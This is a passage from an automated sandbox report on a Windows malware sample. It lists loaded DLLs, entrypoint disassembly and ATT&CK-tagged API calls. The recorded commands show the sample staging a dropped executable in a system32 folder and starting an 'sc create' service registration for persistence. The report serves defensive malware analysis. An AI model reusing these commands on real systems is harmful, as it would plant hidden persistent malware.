loaded module \"OLE32.DLL\" at base 76b30000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"CRYPTBASE.DLL\" at base 74be0000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73b60000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"PROPSYS.DLL\" at base 73820000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"COMCTL32.DLL\" at base 73bb0000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"APPHELP.DLL\" at base 74b90000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"CLBCATQ.DLL\" at base 76fa0000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6a440000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75630000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"SETUPAPI.DLL\" at base 751d0000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"RPCRT4.DLL\" at base 75bd0000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73820000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"NTMARTA.DLL\" at base 74150000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76f70000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"PROFAPI.DLL\" at base 74d00000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 74e10000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 769e0000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"SECUR32.DLL\" at base 74a20000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75010000\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74b90000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70230000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 75630000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 755e0000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 76f30000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70230000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 75630000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 70b30000\n \"sc.exe\" loaded module \"RPCRT4.DLL\" at base 75bd0000\n \"jwifylqa.exe\" loaded module \"KERNEL32.DLL\" at base 75630000\n \"jwifylqa.exe\" loaded module \"WS2_32.DLL\" at base 75b90000\n \"jwifylqa.exe\" loaded module \"DBGHELP.DLL\" at base 6f1d0000\n \"jwifylqa.exe\" loaded module \"USER32.DLL\" at base 76d10000\n \"jwifylqa.exe\" loaded module \"ADVAPI32.DLL\" at base 768d0000\n \"jwifylqa.exe\" loaded module \"SHELL32.DLL\" at base 75c80000\n \"jwifylqa.exe\" loaded module \"OLEAUT32.DLL\" at base 75020000\n \"jwifylqa.exe\" loaded module \"MSVCR100.DLL\" at base 69b70000\n \"jwifylqa.exe\" loaded module \"SSPICLI.DLL\" at base 74b70000\n \"jwifylqa.exe\" loaded module \"RPCRT4.DLL\" at base 75bd0000\n \"jwifylqa.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76f70000\n \"jwifylqa.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74b90000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70230000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"netsh.exe\" loaded module \"KERNEL32\" at base 75630000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"netsh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 70b30000\n \"netsh.exe\" loaded module \"NSHWFP.DLL\" at base 69c30000\n \"netsh.exe\" loaded module \"DHCPCMONITOR.DLL\" at base 72b60000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 71ca0000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 75630000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 71cf0000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6c3b0000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 6b1d0000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75630000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6dc60000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 6b7c0000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 6cf60000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 6c890000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 6c7b0000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 6b650000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 69ed0000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 69b30000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 75bd0000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 699d0000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 6c3a0000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 695b0000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 694d0000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 6bde0000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 69420000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 76b30000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 74be0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73b60000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 746f0000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 76d10000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 76fa0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6c430000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 768d0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 76f70000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 76f70000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 76f70000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76f70000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74480000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 74c80000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6f2c0000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 74e80000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 742c0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 743c0000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 75020000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70230000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"svchost.exe\" loaded module \"KERNEL32\" at base 75630000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"svchost.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 70b30000\n \"svchost.exe\" loaded module \"NTDLL.DLL\" at base 76de0000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 73040000\n \"svchost.exe\" loaded module \"DHCPCSVC.DLL\" at base 72ed0000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 75bd0000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 72f50000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73370000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 72d80000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76f70000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 72d00000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 746b0000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 74570000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 72cf0000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 75b90000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 72fb0000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 71430000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 74b70000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76f70000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74210000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"jwifylqa.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e276b@ADVAPI32.dll\"\n \"0e000f00703f276b@ADVAPI32.dll\"\n \"0e000f00cc3f276b@ADVAPI32.dll\"\n \"11001200b447276b@ADVAPI32.dll\"\n \"110012004848276b@ADVAPI32.dll\"\n \"120013008c48276b@ADVAPI32.dll\"\n \"12001300e448276b@ADVAPI32.dll\"\n \"14001500906e276b@ADVAPI32.dll\"\n \"14001500a86e276b@ADVAPI32.dll\"\n \"14001500c06e276b@ADVAPI32.dll\"\n \"17001800d86e276b@ADVAPI32.dll\"\n \"0d000e00f06e276b@ADVAPI32.dll\"\n \"11001200006f276b@ADVAPI32.dll\"\n \"11001200146f276b@ADVAPI32.dll\"\n \"0d000e003449276b@SHELL32.dll\"\n \"0d000e00b049276b@SHELL32.dll\"\n \"0f0010005470276b@ADVAPI32.dll\"\n \"140015009470276b@ADVAPI32.dll\"\n \"14001500ac70276b@ADVAPI32.dll\"\n \"0c000d00f470276b@ADVAPI32.dll\"\n \"0c000d000471276b@ADVAPI32.dll\"\n \"0e000f001471276b@ADVAPI32.dll\"\n \"0e000f002471276b@ADVAPI32.dll\"\n \"0b000c003471276b@ADVAPI32.dll\"\n \"140015006872276b@SETUPAPI.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002632)\n \"cmd.exe\" called \"CreateDirectoryW\" with parameter %WINDIR%\\system32\\qmuelfhl\\ (UID: 00000000-00003100)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00002632)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004684)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004684)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004684)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004684)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00002932)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00002932)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002932)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002932)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002932)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002932)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00002356)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00002356)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002356)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002356)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002356)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002356)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00001072)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00001072)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001072)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001072)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001072)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001072)\n \"jwifylqa.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00003564)\n \"jwifylqa.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003564)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHWFP.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DHCPCMONITOR.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpcsvc.dll (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005392)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005392)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005312)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005312)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005312)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005312)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005312)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00005312)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00005312)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005312)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005312)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005312)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\qmuelfhl\\\" - (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\jwifylqa.exe\" %WINDIR%\\system32\\qmuelfhl\\\" - (UID: 00000000-00002632)\n \"9e6e248d1fb56d18df4ae8b8b6f2ddd7161cf848897d3d5a26a9324c8851323d.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create qmuelfhl binPath= 